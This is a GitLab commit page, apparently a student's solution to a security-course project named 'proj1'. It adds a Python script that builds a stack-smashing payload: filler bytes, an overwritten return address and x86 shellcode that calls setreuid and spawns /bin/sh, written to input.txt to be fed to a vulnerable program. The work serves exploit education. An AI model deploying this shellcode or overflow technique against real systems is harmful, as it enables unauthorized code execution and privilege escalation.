Skip to content
Snippets Groups Projects
Commit 2052a693 authored by Recolic Keghart's avatar Recolic Keghart
Browse files

proj1 done

parent 585fbd68
No related branches found
No related tags found
No related merge requests found
Hide whitespace changes
Inline Side-by-side
proj1/solution/egg 0 → 100755
+ 5
0
View file @ 2052a693
#!/bin/bash
./egg3 > /dev/null
cat input.txt # | invoke dejavu
proj1/solution/egg3 0 → 100755
+ 29
0
View file @ 2052a693
#!/usr/bin/python3
def fuck8(txt):
assert(len(txt) == 8)
return txt[6:8] + txt[4:6] + txt[2:4] + txt[0:2]
def revert(txt):
assert(len(txt) % 8 == 0)
res = ""
for i in range(int(len(txt) / 8)):
res += fuck8(txt[i*8:(i+1)*8])
return res
fill = "0123456789abcdef0123456789abcdef01234567"
raddr = "bffffa40" # "bffffa40"
#shellcode = "\x6a\x31\x58\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x54\x5b\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
shellcode = "6a3158cd8089c389c16a4658cd8031c050682f2f7368682f62696e545b505389e131d2b00bcd800a"
########################################################################################### <- append an endline (0x0a, \n)
payload = revert(fill) + revert(raddr) + (shellcode)
print(payload)
import binascii
b = binascii.unhexlify(payload)
with open('input.txt','wb+') as f:
f.write(b)
0% or .
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment